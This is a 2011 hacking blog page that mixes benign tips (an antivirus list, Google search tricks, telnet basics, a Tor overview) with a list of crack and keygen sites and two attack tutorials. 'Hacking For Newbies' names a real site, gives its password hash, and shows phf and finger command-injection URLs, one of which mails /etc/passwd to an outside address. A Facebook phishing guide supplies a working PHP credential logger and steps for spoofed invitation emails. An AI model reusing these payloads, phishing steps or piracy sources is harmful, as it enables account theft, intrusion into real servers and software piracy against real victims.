Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Wednesday, 30 November 2011

Best Free Antivirus Software

To protect own computer from viruses, trojan, worm and similar threats, you should use a high-quality anti-virus software. Not using anti-virus software leaves you open to viruses, which may lead to more malware invading your system. Make sure that you install only one anti-virus software, doing otherwise will cause severe system instability.Here comes frequently asked question: Which anti-virus should I use?Many of us pay a lot of money to buy anti-virus software, but this is so unnecessary, because there are plenty of good free anti-virus software that offer the same kind of protection as the boxed software you can buy at the store.To help you out, I decided to provide you the list of top 9 free anti-virus. Let’s begin with it.






1)Avast
Avast Home Edition Select from the Download Link below.
Download Page brothersoft.com
File size 23.1 MB
Author ALWIL Software
Operating System Windows All
The Best Review about avast chosen by PC Hacks Freeware Mission



Note: Free, but you’ll need to register for a product key


2)AVG
AVG Select from the Download Link below.
Download Page brothersoft.com
File size 29 MB
Operating System Windows 2000, XP, XP Pro x64 Edition, Vista, Vista x64 Edition
The Best Review about AVG chosen by PC Hacks AVG Free Edition antivirus review



3)Antivir
AntiVir Select from the Download Link below.
Download Page brothersoft.com
File size 23.9 MB
Operating System Windows 98, Me, NT, 2000, XP, Vista
The Best Review about AntiVir chosen by PC Hacks AntiVir Personal Edition Classic Review


4)ClamWin
ClamWin Select from the Download Link below.
Download Page brothersoft.com
File size 5.61MB
Operating System Windows,2000, 2003, NT, Vista, XP
The Best Review about ClamWin chosen by PC Hacks ClamWin Review


5)PC Tools
PC Tools Select from the Download Link below.
Download Page brothersoft.com
File size 21.67MB
Operating System Windows 98/ME/2000/XP
The Best Review about PC Tools chosen by PC Hacks PC Tools Review


6)Rising Antivirus
Rising Antivirus Select from the Download Link below.
Download Page softpedia.com
File size 60.9 MB
Operating System Windows All
The Best Review about Rising Antivirus chosen by PC Hacks Rising Antivirus Review


7)Spyware Terminator
Spyware Terminator Select from the Download Link below.
Download Page brothersoft.com
File size 631 KB
Operating System Windows All
The Best Review about Spyware Terminator chosen by PC Hacks Spyware Terminator Review



8)Moon Secure Antivirus
Moon Secure Select from the Download Link below.
Download Page moonsecure.com
File size 10.4 MB
Operating System Windows 95/98/98SE/2000/NT/XP
The Best Review about Moon Secure chosen by PC Hacks Moon Secure Review


9)Spyware Doctor + Antivirus 2010
Spyware Doctor + Antivirus 2010 Select from the Download Link below.
Download Page virus protection
File size 34.6 MB
Operating System Windows 95/98/98SE/2000/NT/XP

If you know any free anti-virus software that I didn’t mention, please write a comment, and I will add it

The list of free crack and keygen sites that are safe to use

Are you looking for a serial key and can’t find it no matter how much you try? Well, if that is driving you crazy, a visit to the next websites might just put an end to that. Here is the list of free crack and keygen sites that are safe to use.These crack sites won’t try to bombard you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Botnet army.Let’s begin.

1)www.smartserials.com



2)www.keygenguru.com


3)www.serialkey.net


4)www.zcrack.com


5) www.subserials.net


6)www.supercracks.net


7) www.serialcrackz.com


8)www.serials.be


9)www.cracksfm.com


10)www.cracksearchengine.net

Google Search Tips


As we all know Google is first name in terms of searching for anything online, but ”
Do you use the full power of Google search?” or you’ve likely only scratched the surface.
Most people use their Google for searching simple keywords , but it can do so much more, such as finding phone numbers and being a simple calculator. Here is the list of best search engine tips, which will help you to find interesting and useful information
1) Google Currency Conversion
Convert any curreny on Google anytime
Examples:
1 USD = ? PKR
1 Pound = ? USD

2)Google Definitions
Use Google as a online dictionary
Examples:
define:computer
define:star
define:car

3)Google Weather
Google can also provide world weather. You can search weather of your location.
Examples:
Weather Zagreb, Croatia
Weather London, United Kingdom

4)Google Book Search
Google helps you to get the world’s information online by bringing online books.
Examples:
Books about Animals
Books about Software
5)Time
To see the time in many cities around the world, type in “time” and the name of the city.
Examples:
time London
time New York

6)Calculator
To use Google’s built-in calculator function, simply enter the calculation you’d like done into the search box.
Example:
5*9+(sqrt 10)^3=

7)Telephone Number
Find the US public, business, and residential telephone numbers.
Examples :
phonebook: John
phonebook: Tim

8)Maps
Looking for a map? Type in the name or U.S. zip code of a location and the word “map” and we’ll return a map of that location. Clicking on the map will take you to a larger version on Google Maps.
Examples:
Seattle map
Zagreb map

Cool Computer Tricks

Looking cool computer tricks? Here is something that should pique your interest: Use Keyboard As Mouse, On Screen Keyboard and Transform your Windows XP in to Windows 7.

Use Keyboard As Mouse

When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter .

Use the Numerical pad for controlling the mouse pointer.
5 is for click.
+ is for double click
- for right click.

On Screen Keyboard

On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick..
To use it go to start-> run and type osk


Transform your Windows XP in to Windows 7

If you are using Windows XP and want to experience Windows 7 without installing then here is Seven Remix XP transformation pack to transform Windows XP to Windows 7.With this simple app you can make your XP look like Windows 7 in just few clicks. It supports Windows XP, Windows 2003, Windows Media Center Edition and some other flavors of XP. Will work with only 32 bit edition of Windows.
Just download it and install .
click here to Download Seven Remix XP and transform your windows xp .

 

Wednesday, 23 November 2011

Hacking on XP part 2

How to Telnet with Windows XP
The queen of hacker commands is telnet. To get Windows help for
telnet, in the cmd.exe window give the command:
C:\>telnet /?
Here's what you will get:
telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]
-a Attempt automatic logon. Same as -l option except uses
the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system.
Requires that the remote system support the TELNET ENVIRON
option.
-t Specifies terminal type.
Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer
to connect to.
port Specifies a port number or service name.
****************
Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
****************
The simplest use of telnet is to log into a remote computer. Give the
command:
C:/>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)
If this computer is set up to let people log into accounts, you may
get the message:
login:
Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.
****************
Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
****************
Then comes the message:
Password:
Again, be exact in typing in your password.
What if this doesn't work?
Every day people write to me complaining they can't telnet. That is
usually because they try to telnet into a computer, or a port on a
computer that is set up to refuse telnet connections. Here's what it
might look like when a computer refuses a telnet connection:
C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Or you might see:
C:\ >telnet techbroker.com
Connecting To techbroker.com...Could not open connection to the host, on port 23.
No connection could be made because the target machine actively
refused it.
If you just give the telnet command without giving a port number, it
will automatically try to connect on port 23, which sometimes runs a
telnet server.
**************
Newbie note: your Windows computer has a telnet client program,
meaning it will let you telnet out of it. However you have to install
a telnet server before anyone can telnet into port 23 on your
computer.
*************
If telnet failed to connect, possibly the computer you were trying to
telnet into was down or just plain no longer in existence. Maybe the
people who run that computer don't want you to telnet into it.
How to Telnet into a Shell Account
Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:
C:/telnet freeshell.org 22
SSH-1.99-OpenSSH_3.4p1
That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at
<http://freeshell.org/> . You can get a free SSH client program from
<http://winfiles.com/> .
One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with tht talk command. Another fun thing, if your shell account allows it, is to give the command
ps -auxww
It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!
***************
You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
*************
Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.
If I try to telnet to this email program from outside this computer,
here's what happens:
C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on
port 25.
No connection could be made because the target machine actively
refused it.
However, if I log into an account on 10.0.0.3 and then telnet from
inside to port 25, here's what I get:
Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical
address meaning localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix
The reason I keep this port 25 hidden behind a firewall is to keep
people from using it to try to break in or to forge email. Now the
ubergeniuses reading this will start to make fun of me because no
Internet address that begins with 10. is reachable from the Internet.
However, sometimes I place this "test-box" computer online with a
static Internet address, meaning whenever it is on the Internet, it
always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.
***************
Newbie note: What is all this about headers? It's stuff at the
beginning of an email that may - or may not - tell you a lot about
where it came from and when. To see full headers, in Outlook click
view -> full headers. In Eudora, click the "Blah blah blah" icon.
****************
Click here to see Hack on XP part 1

Tuesday, 22 November 2011

Hacking on XP part 1

Part I: The Magic of DOS
In this guide you will learn how to telnet <beginninea.shtml>, forge email, <beginnineb.shtml> use
nslookup <beginninec.shtml> and netcat <beginnined.shtml> with Windows XP.
So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?
****************
Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people's TV sets and steal Sandra Bullock's email is going to find out that I won't tell them how.
****************
The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.
The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run right in cmd.exe will work in command.com
****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************
DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.
****************
You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
****************
So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like this:

       





Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.
TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp
NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup
TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.
NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.

Hacking For Newbies

Introduction:- OK, this file is intended solely for people who know very little about hacking, and when I say very little I mean very little.  Now, for those of you jumping happily around and screaming "Finally, I am gonna be a hacker!” stop jumping around and just sit down, take a few deep breaths, and just relax. 

After reading this file you should be able to hack
      1 - A WWWBOARD,
      2 - FTP/UNIX sites,
      3 - Website Tricks, and
      4 - Neat stuff/Misc. with much confidence.

Now, on to the disclaimer:
*** I will NOT be held responsible for what you do with this information. ***

NOTE:  All commands that are written in this file, with the exception of the John the Ripper commands, like "edit passwd" are for DOS, so if you have UNIX use the VI editor or something of the sort.

OK, now there is no specific table of contents of this file, I am pretty much just going to make it up as I go along.  Now, for you advanced hackers out there, I would recommend just leaving this file because you probably won't find much in this file that you don't already know.  All right, now that I'm done this stupid raving rant, I can start explaining how to go about learning what you want to learn.

1 - How to hack a WWWBOARD (Credit going to kM of www.hackersclub.com for coming up with this brilliant idea, lets all applaud kM.)

OK, now obviously, in order to hack a WWWBOARD you need some sort of password file.  Now, defaultly the passwd file is in the WWWBOARD directory.  Most people who run the WWBOARD think to themselves "Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?"  Well, the odds are pretty damn good.  Now, when I say hack I mean both just to explore and just to do fun stuff like deleting files.  I am not saying deleting files is GOOD, but sometimes it is fun.  Anyway, the passwd file is almost always in the WWWBOARD directory, so lets take a real WWWBOARD.

The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/.  Now, if you go to that URL you will see a listing of files.  For the purpose of this file ONLY, and not malicious intent, I have not alerted the site of this problem.  Now, go to that URL and click on the file passwd.txt.  You will get two words that look like this:

WebAdmin:aepTOqxOi4i8U

The first word, WebAdmin, is the username of, obviously, the operator of this WWWBOARD.  The second "word" is the password, now, your probably sitting there looking at that word thinking to yourself "God damn, that is one funky password!" Well, stop thinking that because yes, that is the password, but it is encrypted.  So, you have to get a password cracker.  Now, I recommend one of two Password Crackers, either CrackerJack or John the Ripper, both of these can be found at http://www.hackersclub.com or almost any other hacking site.  Once you go and get a password cracker you will most likely need a Word File.  Those to can be found at http://www.hackersclub.com.  Once you get the necessary stuff, you will need to copy the password file, WebAdmin:aepTOqxOi4i8U, and paste it into an empty notepad file or something of the sort.  Now, you are probably thinking to yourself again "Alright, now I can crack this bad-ass of a password and become a hacker!"  Sorry to rain on your parade, but no.  Yes, you might be able to crack the password, but then ask yourself one question, once I got the password, what do I do with it??  Do I go mail it to the server www.cobleskill.edu and say "Hey, I got your passwd, now give me complete access to your WWWBOARD!" Sorry, if you do that, you will be thinking for about 10 years in prison "What did I do wrong?" or you might become Bruno's sweet boy.  Sound like fun??  Didn't think so.  OK, now IF you crack the password file, and you get the Username and Password, unencrypted of course, paste it into a text document or something, then add this right onto it - ":-2:-2:anonymous NFS user:/:/bin/date"  What that will do will turn the WWWBOARD passwd file into a UNIX passwd file.  If you don't do that then you will never crack the file.  All in all the passwd file should look like this: "WebAdmin:aepTOqxOi4i8U:-2:-2:anonymous NFS user:/:/bin/date"  Now, I don't use CrackerJack, so if you got that I can't help you, but if you got John the Ripper then type in this command in DOS : "john -pwfile:xxxxx -wordfile:xxxxx"  XXXXX is whatever you named the passwd file or the word file.  For example, "john -pwfile:hehe.txt -wordfile:WF.txt"  It should just screw around for awhile and compute stuff and then if it is cracked you will get on the left side of the screen the passwd, WebBoard, and the Username, WebAdmin.  Now, WebAdmin and WebBoard are the two-default username and passwds.  Shows you about security these days.  Now, once you got those two things, go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL.  If none of those are there then you should examine the rest of the files in the directory.  When I was in the directory the file wasn't there, but I found it nevertheless, I am not going to tell you what it is, but once you find it you will get something like this:
WWWAdmin For WWWBoard

Choose your Method of modifying WWWBoard Below:
     Remove Files
          Remove Files
          Remove Files by Message Number
          Remove Files by Date
          Remove Files by Author

     Password
          Change Admin Password

That is, you guessed it, the little "Operating Station" for the WWWBOARD.  Now, to do any of those things you must have the Username and Passwd that you cracked.  So, click on an option and I think the rest is pretty much self-explanatory.  I really do not recommend trashing the WWWBOARD, some people depend on them to get a lot of questions and answers, etc.  I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable.

2 - Hacking an FTP site

OK, now hacking an FTP site WAS pretty easy a while ago, but nowadays most passwd files are shadowed which adds a little bit of extra security.  I'll explain it later.  OK, now, just before we start, the passwd file on UNIX machines is "passwd" not "passwd.txt."  OK, now, for the example site we are going to use http://www.freestuff.com.  Now, with the information I am going to give you will not let you hack this site because the passwd file is shadowed, as is almost every single website, but nevertheless, if you "experience" hacking long enough, you will find the answer on how to get the file.  OK, now the first step is to do 1 of 2 things, get an FTP browser, like CuteFTP or BulletFTP or something, or you can use Win95 FTP which no one really knows about and how I found out is beyond my memory.  OK, I will explain the FTP browser way first.  OK, fire up the FTP Browser and for the host name plug in www.freestuff.com and for the port leave it at whatever it is, and hit connect, if there are any other options, then just screw around with them for a while and you'll figure it out.  Anyway, for the access type or whatever, click on Anonymous, and after you hit connect you'll get some directories in the Remote Host box, and some other neat stuff in Local Host.  Now, in the Remote Host section you want to double click on the "etc" directory if it is visible, if it is not, then see in the pull-down menus if there is an option called custom command.  If there is then click on it and for the command type in "cd etc" and it will either say "OK, CWD command accepted" or something along the lines of that or it will say "..:Access Denied" or even "Error:There is no file or directory by that name."  If you get the CWD command accepted then were in business.  In the /etc/ directory you should see a file called passwd. If you don’t then go back up to custom command an for the command type in "get /etc/passwd" and it will either say "OK, Port command successful" or it will say "..:Access Denied."  If you see that file then you can just drag the file over to local host and then click on the button "Start Download" or "Start Query" or something like that.

Now, if you have Win95 FTP you will have to go the Start Menu MS-DOS Prompt and type in "FTP WWW.FREESTUFF.COM" and it will show up a bunch of neat little messages like "connecting to www.freestuff.com" and other stuff.  Eventually you will get to the login screen where it will say "(USER)" or something interesting and long like that.  Now, for User type in Anonymous.  If it accepts it will say "Password" or it will say, "Anonymous access not allowed on this server." Now, obviously the FBI or CIA is not going to allow ftp access, so don't even try it.  Now, if you get to the password part, just type in something interesting like "Suckhole@" and the ftp server will fill in the rest.  You can make it anything you want, now you'll either get 1 of 2 messages, within a marginal error, "Cannot set guest privileges" or this "Anonymous access allowed, guest privileges set."  Those should be the only two that you get.  If there are any others, these messages are pretty much self explanatory.  Now, when you log on, the first thing you want to type is this command "pwd."  Just that, it will display the current directory that you are in.  You want it to say "/."  If it doesn't then type this command about 3 times "cd .."  That will take you down 1 directory/subdirectory.  Once you get to the "/" directory, type this command "ls -a."  It will list all the files in the directory, including the hidden ones.  Now, if you see something in the listing that says "etc" then type this command "cd etc."  That will move you into the "etc" directory.  Just to be sure, type in "pwd" again to make sure you’re in the "etc" directory.  If you are, then good, and type "ls -a" again and you should get some of these files: "Pwd.db, passwd, group, netconfig, net.config, or maybe even master.passwd."  The two files we are most interested in are "passwd" and "master.passwd."  I think what the files hold are kind of self-explanatory, but I'll tell you anyway, the "passwd" file holds all the usernames and passwd's that are on the entire system that your rooting around on.  The "master.passwd" file will only show up if the passwd file is shadowed, and it also means the SysAdmin is a complete brain puppy.  Forget "master.passwd" for now.  The command you want to issue to this system is to get the "passwd" file from their computer to your computer, and we do that by simply typing, "get passwd."  It should barf up some neat stuff, and then start transferring the file.  When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the "ftp www.freestuff.com" from.  Now, you just want to type in "quit."  That will log you off the server.  Now, for some reason right when you logoff the server you want to log back on just hit the "F3" key and it will pop up your last command.  Now, what you want to do is move the passwd file to wherever your passwd cracker is.  You can do that by typing, "move passwd X:\XX."  X is the drive that your passwd cracker is on and XX is the directory the passwd cracker is in.  Then it should say something like this: passwd -------> X:\XX -->OK" or something like that.  Once you have moved the passwd file go the passwd crackers directory and open up the file by typing "Edit passwd."  If the file has a bunch of stuff that looks like this:

root:x:x:x:x:x:x:
daemon:x:x:x:x:x:x

If it looks like that, not all the x's, just one by the usernames, then the passwd file is shadowed and can’t be cracked, might as well delete it (More info on shadowed passwd's at the bottom of this file).  If it isn't shadow then just type in the passwd cracking command and get ready to hack a server!  I still highly recommend not doing any damage, there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you, But don't worry, every 8 out of 10 servers that are aware of having an attempted hack don't report it and just go about there business.  Now, one more thing, if you get on the server with root access (basically root means that you can do anything, you are God on this system) then there are log files that record what happens to you, now, I think I am handing you more than enough information, so I am going to let you found out how to wipe your presence from the system, there are plenty of .txt files out there that tell you how to do it.

3 - Website Tricks

OK, now these Website tricks are "tricks" to get the passwd file without using FTP Browser or FTP Browsers.

The PHF Trick
OK, now this phf trick is a bit tricky (hehehe), not to use, but in the fact that some sites have added a command in there HTML code that if the phf command is issued then it will display a message like "Smile your on candid camera!" or it will say this "Your hack attempt has been logged and sent to the proper authorities."  Sit the hell down, drop that shotgun, unbar your door, and stop whimpering about how your going to get busted and raped in prison by Scruffy.  90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt.  They just do that to scare the living shit out of Newbies or anybody who does that.  It is bullshit, so stop worrying.  OK, now on how to do the phf trick.  This trick practically never works anymore, but hey, its fun to try on old school sites and stuff like that.  I don't have an example site cause I really don't want to hunt down a site that this trick works on, so go find on yourself and don't send me e-mail about how you can't find a site that this doesn't work on.  In order to do this trick the site must have a /cgi-bin/ directory.  If it doesn't, then just leave it and forget the whole damn thing on that site, but if it does then keep reading.  I am going to make this quick, an example would be this: http://www.Imanasshole.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That will bring up the passwd file, but 95% of the time you'll get this very common and even more very crappy error about how the file doesn't exist.  OK, that's the phf trick.  Now, onto the finger-box hacking trick.

Finger-Box Hacking
Again for the finger-box hack to work you have to find a website with the /cgi-bin/ directory.  I am just going to post the basic outline of commands for this cause my fingers are getting very tired of typing this :-).  An example of finger-box hack is this:

http://www.XXXXX.com/cgi-bin/finger

After you type that in you will get a box, if you don't then the finger isn't there or you don't have access to it, and in the box type this:

nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd

Substitute where necessary, I have never actually gotten this trick to work cause I've never tried it more than once or twice cause I never needed it, but I knew about it so go crazy :-).

Rewriting A Web page Right From Your Web Browser
In order to do this trick again you need the /cgi-bin/ directory on your "target" site.  For example, type this when you have a website that has the /cgi-bin/ directory:

http://www.XXXXX.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some stuff"%2

"Some stuff" is whatever you want to add basically, but beware, sometimes the web site can track you using the cookies that you sent while on there page, so just to be sure that they don't have cookie requests, if you have Netscape, then in the configuration somewhere, I forget where, check the box that says "Enable alert when accepting a cookie" or something that looks along the lines of that.

4 - Neat stuff/Misc.

The first thing I am going to cover is just some very interesting tricks that I know about AltaVista, http://www.Altavista.com.  These tricks only involve you typing in something for the search query.  OK, here are a list of words and things that will bring up very interesting files from websites:

root:
root
passwd.txt
wwwadmin.cgi
wwwboard.cgi
wwwadmin.pl
wwwboard.pl
passwd (Note: supposed to bring up UNIX passwd files but I haven’t tried it, so if you try it send me some e-mail and let me know what happens).
wwwboard (Note: brings up the wwwboard directories so you can look for the passwd.txt file and other neat stuff).
master.passwd (Note: again, never tried it, so send me some feedback, let me know if it is even actually worth some1's time of typing it in, or just a hoax).

OK, those words work in about almost any search engine, but work best with AltaVista because AltaVista searches the links on the pages in it's archive for your word, and almost every page has a link to it's passwd file or something other that is of interest.

OK, now this next trick I thought of when I d/led HakTek to check it out it had a feature of deleting mail-bombed messages, now, if you don't have HakTek, and don't want it/can't find it, then just go into the mail directory of your web browser, and delete all the mail and the mail bomber has wasted his time.

Now I am just going to give you some UNIX commands and what they do, so if you want to be a UNIX fan or LINUX fan then check these out:
cd X - X = the directory that you want to switch to
ls - list all the files in a directory, excluding the hidden ones
ls -a - lists all the files in a directory, including the hidden ones
ls -A - lists all the hidden files in a directory, but not the . and ..
ls -ALF - lists the properties of all the files in a directory
cd .. - goes down one directory/subdirectory
cd . - absolutely nothing!
quit - log off the ftp site (obviously only on Win95 FTP)

Those commands listed above work on BOTH FTP sites AND UNIX machines, now here are commands that work ONLY on UNIX machines:

cat X - the file you want to view
vi - Visual Editor that you can use to edit files
edit - edit files (not sure on this one, works on some UNIX's)
ed - edit files (on all machines)
chmod - change the ownership of a file
help - list of commands that you can use (Note: * next to command means that it is not used on that certain UNIX machine)
man X - for further information on a CERTAIN UNIX command whereas X is the command that you want more information on this.

Saturday, 19 November 2011

How to Stay Anonymous on the Internet Using Tor ?

Why you should hide yourself?
Internet is risky place to surf, here your privacy is not secure as you think.  Others can track what you are searching or what is your interest(Based on that , scammers can scam you).  Some websites store your real IP. An attacker can get the IP from the website by attacking that website.  Using your IP , he can take control of your System(using Open Port).  Two weeks back, we explained about the Facebook Privacy Ris.  If you want to secure your privacy, this article will help you. 
Download Tor From Here

What is Tor and Usage?
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

For Individual: They use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.

For Journalists: They use Tor to communicate more safely with whistleblowers and dissidents. Non-governmental organizations (NGOs) use Tor to allow their workers to connect to their home website while they're in a foreign country, without notifying everybody nearby that they're working with that organization.

For Groups such as Indymedia recommend Tor for safeguarding their members' online privacy and security. Activist groups like the Electronic Frontier Foundation (EFF) recommend Tor as a mechanism for maintaining civil liberties online. Corporations use Tor as a safe way to conduct competitive analysis, and to protect sensitive procurement patterns from eavesdroppers. They also use it to replace traditional VPNs, which reveal the exact amount and timing of communication. Which locations have employees working late? Which locations have employees consulting job-hunting websites? Which research divisions are communicating with the company's patent lawyers?

A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.

How to Hack Facebook Account Using Phising webPage

Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .


Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.



Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"

Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like : FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated* 
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  






Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 



Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only.

5 Basic Mobile Security Tips to avoid Dangerous Application ,McAfee



